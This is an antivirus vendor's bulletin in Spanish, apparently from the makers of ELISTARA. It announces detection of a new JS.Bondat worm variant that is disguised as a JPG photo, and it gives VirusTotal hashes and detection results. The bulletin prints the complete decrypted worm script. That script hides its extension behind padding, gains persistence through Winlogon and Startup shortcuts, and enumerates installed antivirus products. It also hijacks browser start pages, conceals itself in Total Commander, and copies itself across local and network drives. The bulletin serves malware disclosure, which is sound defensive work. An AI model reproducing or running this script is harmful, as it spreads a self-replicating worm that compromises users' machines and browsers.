NUEVA VARIANTE DE JS.BONDAT (variante cifrada de JS:CRISAS)

Una nueva variante que llega en fichero DSC04492.JPG .jse (aparenta ser un JPG pero realmente es un JS), pasa a ser controlado a partir del ELISTARA 23.17 de hoy

El preanalisis de virustotal ofrece el siguiente informe:

MD5 9df7381e713b6bb6721c68ceb898d9c2
SHA1 5a694472f5ce9bf23d669ddd4dc967fb0a8ab7e4
File size 25.9 KB ( 26563 bytes )
SHA256: bab05a7e7bd1421a5b5e5a6c9c3b550fdff0d17331a656e461a85ddbd59ab9c3
File name: DSC04492.JPG …
Detection ratio: 3 / 57
Analysis date: 2015-04-27 08:40:07 UTC ( 2 hours, 39 minutes ago )

0 1

Antivirus Result Updatebo
DrWeb SCRIPT.Virus 20150427
McAfee-GW-Edition BehavesLike.JS.ExploitBlacole.mx 20150427
NANO-Antivirus Trojan.Script.StartPage.gcle 20150427

El fichero descifrado ofrece este script:

try{a=WScript.CreateObject(‘Scri’+’pting.Fi’+’leSys’+’temObj’+’ect’);b=WScript.CreateObject(‘WSc’+’ript.Sh’+’ell’);s=WScript.CreateObject(‘She’+’ll.Appli’+’cation’);wl=WScript.CreateObject(‘WbemScr’+’ipting.SWbemL’+’ocator’);db=WScript.CreateObject(‘ADO’+’DB.Str’+’eam’);db.CharSet=”US-ASCII”;db.Type=2;c3=b.SpecialFolders(“Startup”);nt6=(b.RegRead(‘HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentVersion’)>=6?true:false);jico=b.RegRead(“HKLM\\SOFTWARE\\Classes\\”+b.RegRead(“HKLM\\SOFTWARE\\Classes\\.jpg\\”)+”\\DefaultIcon\\”);ico=”explorer.exe”;g=WScript.ScriptFullName;da=new Date();ano=da.getYear()+””;mes=da.getMonth();dia=da.getDate();hra=0;antv=new Array(“”);rgk=”HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run”;wlg=”HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell”;gn=new Array(“IMG”,”IMG_”,”PIC”,”DSC”,”CIMG”,”HPIM”,”IMAG”,”DSCF”,”DSCN”,”DCIM”,”IM”,”PICT”,”SAM_”);sp=””;for(r=0;r<94;r++){sp+=” “;}ex=gn[Math.round(Math.random()*12)]+ano.substring(2,4)+””+mes+dia+”.JPG”+sp+”.jse”;jex=””;tas=”explorer”;fsz=a.GetFile(g).Size;wsc=WScript.FullName;stl=”https://www.google.es/#output=search&sclient=psy-ab&q=fiverdolly+”;stp=stl+fsz;if(s.NameSpace(26)==”Roaming”){tot=a.GetFolder(s.NameSpace(26).ParseName(“Microsoft”).Path).ParentFolder;}else{tot=s.NameSpace(40).ParseName(s.NameSpace(26)).Path;}nt();}catch(e){}sf=””;function nt(){try{c1=s.NameSpace(28).ParseName(“microsoft”);c2=c1.GetFolder.Items().Count;rf=Math.round(Math.random()*c2-1);c4=c1.GetFolder.Items().item(rf).Path;if(a.FolderExists(c4)==false){c4=a.GetFile(c4).ParentFolder;}}catch(e){c4=c1.Path;}c5=Math.random()*8+1+””;c5=c5.replace(“.”,””);try{b.RegWrite(“HKCU\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\”,jico,”REG_SZ”);}catch(e){}try{jtyp=b.RegRead(“HKLM\\SOFTWARE\\Classes\\jpegfile\\FriendlyTypeName”);b.RegWrite(“HKCU\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName”,jtyp,”REG_EXPAND_SZ”);}catch(e){}try{b.RegWrite(“HKLM\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\”,jico,”REG_SZ”);}catch(e){}try{b.RegWrite(“HKLM\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName”,jtyp,”REG_EXPAND_SZ”);}catch(e){}if(g.substring(g.lastIndexOf(“\\”)+1,g.length).toLowerCase().search(“.jpg”+sp+”.jse”)!=-1){try{if(a.FileExists(g.substring(0,g.lastIndexOf(sp+”.jse”)))==true){b.run(‘”‘+g.substring(0,g.lastIndexOf(sp+”.jse”))+'”‘);}else{wp=b.RegRead(“HKCU\\Control Panel\\Desktop\\Wallpaper”);if(wp.substring(wp.lastIndexOf(“\\”)+1,wp.length)==”TranscodedWallpaper”){jpgc=b.RegRead(“HKLM\\SOFTWARE\\Classes\\jpegfile\\shell\\open\\command\\”).replace(“%1”,wp);b.run(jpgc);}else{b.run(‘”‘+wp+'”‘);}}}catch(e){}try{sc=wl.ConnectServer(null, “root\\default”);rg=sc.Get(“StdRegProv”);m=rg.Methods_.Item(“EnumValues”);pin=m.InParameters.SpawnInstance_();rk=new Object();rk[“HKCU”]=rk[“HKEY_CURRENT_USER”]=0x80000001;rv=rk[rgk.substr(0,rgk.indexOf(“\\”))];pin.hDefKey=rv;pin.sSubKeyName=rgk.substr(rgk.indexOf(“\\”) + 1);pot=rg.ExecMethod_(m.Name,pin);ak=pot.sNames.toArray();for(key in ak){tts=b.RegRead(rgk+”\\”+ak[key])+””;if(tts.search(“.exe”)!=-1){tts2=tts.substring(0,tts.search(“.exe”));tts3=tts2.substring(tts2.lastIndexOf(“:”)-1,tts2.length)+”.exe”;if(a.FileExists(tts3)==true){ico=tts3;}if(tts2.indexOf(“\\”)!=-1){tts2=tts2.substring(tts2.lastIndexOf(“\\”)+1,tts2.length);}tas=tts2;}}}catch(e){}if(tas.indexOf(” “)!=-1){tas=tas.substring(0,tas.indexOf(” “));}if(tas.indexOf(“.”)!=-1){tas=tas.substring(0,tas.indexOf(“.”));}try{newd=fsz;olddf=b.RegRead(wlg);olddf=olddf.substring(olddf.lastIndexOf(‘” “‘)+3,olddf.lastIndexOf(‘”‘));}catch(e){olddf=shcu();}if(a.FileExists(olddf)==true){c4=a.GetFile(olddf).ParentFolder;oldd=a.GetFile(olddf).size;}else{oldd=0;olddf=c4+”\\”+c5;}if(newd>=oldd){if(a.FileExists(olddf)==true){a.GetFile(olddf).Attributes=0;}db.Open();try{av=GetObject(“winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\SecurityCenter”+(nt6?’2’:”));avi=av.ExecQuery(“SELECT * FROM AntiVirusProduct”,”WQL”);navi=new Enumerator(avi);antv=new Array();for(;!navi.atEnd();navi.moveNext()){oav=navi.item();antv.push(oav.displayName);}}catch(e){antv=new Array(“NAC”);}try{vic=”<“+b.RegRead(“HKCU\\Volatile Environment\\LOGONSERVER”).replace(“\\\\”,””)+”:”+b.RegRead(“HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName”)+”=”+s.NameSpace(40)+”:”+antv+”>”;}catch(e){vic=””;}cod=ci();if(cod.search(vic)==-1&&rad!=0){nda=vic+”**/”;his=cod.replace(“**/”,nda);db.WriteText(his);}else{db.WriteText(cod);}db.SaveToFile(olddf,2);db.Close();try{if(a.GetFile(olddf).OpenAsTextStream(1,-2).ReadAll().charCodeAt(0)!=122){a.CopyFile(g,olddf,true);}a.GetFile(olddf).Attributes=2;}catch(e){}wsh=c4+”\\”+tas+”.exe”;try{a.CopyFile(wsc,wsh);}catch(e){}a.GetFile(wsh).Attributes=2;try{drg='”‘+wsh+'” “‘+olddf+'” //E:JScript //B’;shcu();ec=b.CreateShortcut(c3+”\\”+tas+”.lnk”);ec.TargetPath=c4+”\\”+tas+”.exe”;ec.Arguments='”‘+olddf+'” //E:JScript //B -ns’;ec.IconLocation=ico;ec.Save();b.RegWrite(wlg,drg,’REG_SZ’);WScript.Sleep(9999);if(b.RegRead(wlg)==drg){a.DeleteFile(c3+”\\”+tas+”.lnk”);}}catch(e){}}}else{try{if(WScript.Arguments.length==0){b.run(“explorer.exe”);}}catch(e){}try{fcfp=new Array();tcmd=new Array();for(t=0;t<9;t++){tcmd.push(tot+”\\TC201″+t+”\\tcignore.txt”);try{fcfp.push(s.NameSpace(38).ParseName(“TotalCommander201″+t).Path+”\\Tools\\Mozilla Firefox\\defaults\\profile”);}catch(e){}try{fcfp.push(s.NameSpace(48).ParseName(“TotalCommander201″+t).Path+”\\Tools\\Mozilla Firefox\\defaults\\profile”);}catch(e){}}try{tcmd.push(s.NameSpace(38).ParseName(“TC UP”).Path+”\\tcignore.txt”);}catch(e){}try{tcmd.push(s.NameSpace(48).ParseName(“TC UP”).Path+”\\tcignore.txt”);}catch(e){}try{tcmd.push(s.NameSpace(28).ParseName(“ghisler”).Path+”\\tcignore.txt”);}catch(e){}try{tcmd.push(s.NameSpace(26).ParseName(“ghisler”).Path+”\\tcignore.txt”);}catch(e){}tcmd.push(“c:\\totalcmd\\tcignore.txt”);for(t=0;t<tcmd.length;t++){if(a.FileExists(tcmd[t].replace(“tcignore.txt”,”wincmd.ini”))==true){try{db.Open();if(a.FileExists(tcmd[t])==false){ttn=a.CreateTextFile(tcmd[t],true);ttn.Write(“**.**.jse”);ttn.close();}igl=””;try{db.LoadFromFile(tcmd[t]);igl=db.ReadText;}catch(e){}db.Close();if(igl.indexOf(“**.**.jse”)==-1){db.Open();db.WriteText(igl,1);db.WriteText(“**.**.jse”,1);a.DeleteFile(tcmd[t]);db.SaveToFile(tcmd[t]);db.Close();}}catch(e){}try{tor=a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder+”\\Wincmd.ini”,1,true,0);toa=tor.ReadAll();if(toa.search(“IgnoreListFileEnabled=0”)!=-1){toa=toa.replace(“IgnoreListFileEnabled=0″,”IgnoreListFileEnabled=1”);}if(toa.search(“IgnoreListFile=”)==-1){toa=toa.replace(“[Configuration]”,”[Configuration]”+”\nIgnoreListFile=”+tcmd[t]);}if(tcmd[t].search(“TC201”)!=-1){if(toa.search(“=*.jse”)==-1){filt=toa.substring(toa.lastIndexOf(“Filter”)+6,toa.lastIndexOf(“.icon=”));enf=toa.substring(toa.lastIndexOf(“Filter”),toa.length);enl=enf.substring(0,enf.indexOf(“\n”)+1);fln=new Number(filt)+1;ficon=toa.substring(toa.search(“Filter11.icon=”)+14,toa.length);dicon=ficon.substring(0,ficon.search(“\n”));toa=toa.replace(enl,enl+”\nFilter”+fln+”=*.jse\nFilter”+fln+”.icon=”+dicon+”\n”);toa=toa.replace(“FileTipWindows=1″,”FileTipWindows=0”);}}tor.close();tow=a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder+”\\Wincmd.ini”,2,true,0);tow.Write(toa);tow.close();}catch(e){}}}}catch(e){}try{b.RegWrite(“HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page”,stp,”REG_SZ”)}catch(e){}try{if(a.FolderExists(tot+”\\Mozilla\\Firefox\\Profiles”)==true){fpf=a.GetFolder(tot+”\\Mozilla\\Firefox\\Profiles”);pff=new Enumerator(fpf.SubFolders);for(;!pff.atEnd();pff.moveNext()){pfs=pff.item()+””;if(pfs.search(“.default”)!=-1){fcfp.push(pfs);}}}for(q=0;q<fcfp.length;q++){try{if(a.FileExists(fcfp[q]+”\\prefs.js”)==true);{fjf=a.OpenTextFile(fcfp[q]+”\\prefs.js”,1);fjs=fjf.ReadAll();fjf.close();usp=’user_pref(“browser.startup.homepage”,’;if(fjs.indexOf(usp)!=-1){fjs1=fjs.substring(fjs.indexOf(usp)+37,fjs.length);fjs2=fjs1.substring(0,fjs1.indexOf(‘);’)+2);fjs3=fjs.replace(usp+fjs2,usp+’ “‘+stp+'”);’);wjf=a.OpenTextFile(fcfp[q]+”\\prefs.js”,2);wjf.Write(fjs3);}else{wjf=a.OpenTextFile(fcfp[q]+”\\prefs.js”,8);wjf.WriteLine(‘\n’+usp+’ “‘+stp+'”);’);}wjf.close();}}catch(e){}}}catch(e){}try{gfs=s.NameSpace(28).ParseName(“Google”).Path+”\\Chrome\\User Data\\Default\\Preferences”;if(a.FileExists(gfs)==true){gjf=a.OpenTextFile(gfs,1);gjs=gjf.ReadAll();gjf.close();gjsn=gjs.length;urs='”urls_to_restore_on_startup”: [‘;ros='”restore_on_startup”:’;rosm='”restore_on_startup_migrated”:’;if(gjs.indexOf(stl)==-1){if(gjs.indexOf(urs)!=-1){gjs1=gjs.substring(gjs.indexOf(urs)+31,gjsn);gjs2=gjs1.substring(0,gjs1.indexOf(“]”)+1);gjs3=gjs.replace(urs+gjs2,urs+’ “‘+stp+'”, ‘+gjs2);}else{gjs1=gjs.substring(gjs.indexOf(rosm),gjsn);gjs2=gjs1.substring(0,gjs1.indexOf(“\n”)+1);gjs3=gjs.replace(gjs2,rosm+’ true,\n\t’+urs+’ “‘+stp+'” ]\n’);}gjs4=gjs.substring(gjs.indexOf(ros),gjsn);gjs5=gjs4.substring(0,gjs4.indexOf(‘,’)+1);gjs3=gjs3.replace(gjs5,ros+’ 4,’);wjg=a.OpenTextFile(gfs,2);wjg.Write(gjs3);wjg.close();}else{fds=gjs.substring(gjs.indexOf(stl),gjs.length);fdc=fds.substring(0,fds.indexOf(‘”‘));gjs4=gjs.replace(fdc,stp);wjg=a.OpenTextFile(gfs,2);wjg.Write(gjs4);wjg.close();}}}catch(e){}mk();}}function mk(){WScript.Sleep(120000);try{c=new Enumerator(a.Drives);for(;!c.atEnd();c.moveNext()){tipodisco=c.item().DriveType;switch(tipodisco){case 1:case 3:if(c.item()!=”A:” && c.item()!=”B:”){try{sf=a.GetFolder(pe(c.item()+”\\”));tgf=new Enumerator(sf.files);for(;!tgf.atEnd();tgf.moveNext()){stf=tgf.item()+””;if(stf.substring(stf.length-4,stf.length).toUpperCase()==”.JPG”){jex=tgf.item().Name+sp+”.jse”;}if(stf.toLowerCase().indexOf(“.jpg”+sp+”.jse”)!=-1){ex=tgf.item().Name;}}if(a.FileExists(sf+”\\”+ex)==false){if(jex!=””){ex=jex;}a.CopyFile(g,sf+”\\”+ex);if(a.FileExists(sf+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”)))==true){a.GetFile(sf+”\\”+ex).Attributes=a.GetFile(sf+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”))).Attributes;}else{a.GetFile(sf+”\\”+ex).Attributes=0};if(a.FileExists(sf+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”)))==true){a.GetFile(sf+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”))).Attributes=2;}}else{if(a.GetFile(sf+”\\”+ex).Size<fsz){a.GetFile(sf+”\\”+ex).Attributes=0;a.DeleteFile(sf+”\\”+ex);a.CopyFile(g,sf+”\\”+ex);a.GetFile(sf+”\\”+ex).Attributes=0;}}}catch(e){}sf=””;}break;default:break;}}}catch(e){}try{if(hra<12){hra+=1;}if(hra==12){dns=s.NameSpace(18);ens=dns.Items().Count;hns=new Array();for(f=0;f<ens;f++){gns=dns.Items().item(f);hns.push(“dns.Items().Item(“+f+”).GetFolder”);}for(i=0;i<hns.length;i++){try{jns=eval(hns[i]).Items().Count;for(l=0;l<jns;l++){if(a.FolderExists(eval(hns[i]+”.Items().item(“+l+”).Path”))==false){hns.push(hns[i]+”.Items().item(“+l+”).GetFolder”);}else{try{dis=pe(eval(hns[i]+”.Items().item(“+l+”).Path”)+”\\”)+””;di=a.GetFolder(dis);tgf=new Enumerator(di.files);for(;!tgf.atEnd();tgf.moveNext()){stf=tgf.item()+””;if(stf.substring(stf.length-4,stf.length).toUpperCase()==”.JPG”){jex=tgf.item().Name+sp+”.jse”;}if(stf.toLowerCase().indexOf(“.jpg”+sp+”.jse”)!=-1){ex=tgf.item().Name;}}if(a.FileExists(di+”\\”+ex)==false&&dis.charAt(1)!=”:”){if(jex!=””){ex=jex;}a.CopyFile(g,di+”\\”+ex);if(a.FileExists(di+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”)))==true){a.GetFile(di+”\\”+ex).Attributes=a.GetFile(di+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”))).Attributes;}else{a.GetFile(di+”\\”+ex).Attributes=0;}if(a.FileExists(di+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”)))==true){a.GetFile(di+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”))).Attributes=2;}}else{if(a.GetFile(di+”\\”+ex).Size<fsz){a.GetFile(di+”\\”+ex).Attributes=0;a.DeleteFile(di+”\\”+ex);a.CopyFile(g,di+”\\”+ex);a.GetFile(di+”\\”+ex).Attributes=0;}}}catch(e){}}}}catch(e){}}hra=0;}}catch(e){}mk();}function ci(){try{db2=a.OpenTextFile(g,1);g2=db2.ReadAll();db2.Close();g3=g2.substring(g2.search(‘z=”‘)+3,g2.search(‘”;’));g1=g2.substring(0,g2.search(‘z=”‘)+3);gr=g2.substring(g2.search(‘”;’),g2.length);t=ll;tt=””;tm=t.length;rac=Math.round(Math.random()*98)+1;for(x=0;x<tm;x++){num=t.charCodeAt(x)+rac;hx=num.toString(16);if(hx.length<2){hx=”0″+hx;}tt+=hx;hx=”;}if(rac<10){rac=”0″+rac;}tt+=rac;g4=g1+tt+gr;return g4;}catch(e){}}function pe(tar){onef=false;sfp=a.GetFolder(tar);tgc=new Enumerator(sfp.subFolders);for(;!tgc.atEnd();tgc.moveNext()){stc=tgc.item().Name.toLowerCase();if(stc.search(“foto”)!=-1||stc.search(“photo”)!=-1||stc.search(“image”)!=-1||stc.search(“im\u00E1ge”)!=-1||stc.search(“picture”)!=-1){if(onef==false){sfp=a.GetFolder(tgc.item()+”\\”);}onef=true;}}return sfp;}function shcu(){cshc=””;lnks=new Enumerator(a.GetFolder(c3).files);for(;!lnks.atEnd();lnks.moveNext()){try{lks=lnks.item()+””;if(lks.substring(lks.length-4,lks.length).toLowerCase()==”.lnk”){lnka=b.CreateShortcut(lnks.item()).Arguments;if(lnka.search(“//E:JScript //B -ns”)!=-1){cshc=lnka.substring(lnka.indexOf(‘”‘)+1,lnka.lastIndexOf(‘”‘));a.DeleteFile(lnks.item());}}}catch(e){}}return cshc;}

Su preanalisis ofrece el siguiente informe:

MD5 d7b3199951cc07775a97b2458b24c646
SHA1 dfcdcfca4b606902e7540c75b77e4b512210a8d2
SHA256 5f3ad66ad50314fa5553ce1d2d335e3cbc7437f1011a24f6c8bea2a8fc9a84fd
ssdeep192:Q1eZtf8X+Ai/YKVZvwxFsqCq7HkRNymVyKP2TqABly0zDwg0rVCLo2t7OSghIg:GeQOAUmGLq7EVPADym8ZpCM2tS2g
File size 12.6 KB ( 12879 bytes )

SHA256: 5f3ad66ad50314fa5553ce1d2d335e3cbc7437f1011a24f6c8bea2a8fc9a84fd
File name: CodigoVirico.txt
Detection ratio: 9 / 57
Analysis date: 2015-04-27 09:10:42 UTC ( 2 hours, 16 minutes ago )

0 1
Antivirus Result Update
Avast VBS:Obfuscated-gen [Trj] 20150427
DrWeb SCRIPT.Virus 20150427
ESET-NOD32 JS/Bondat.E 20150427
Ikarus Worm.JS.Bondat 20150427
NANO-Antivirus Trojan.Script.StartPage.gcle 20150427
Qihoo-360 Trojan.Generic 20150427
Tencent Js.Worm.Bondat.Wtdj 20150427
TrendMicro-HouseCall Suspicious_GEN.F47V0423 20150427
Zillya Dropper.Inor.VBS.2 20150426

DICHA VERSION DEL ELISTARA 23.17 ESTARÁ DISPONIBLE EN NUESTRA WEB A PARTIR DE las 19 h CEST DE HOY
saludos

ms; 27-4-2015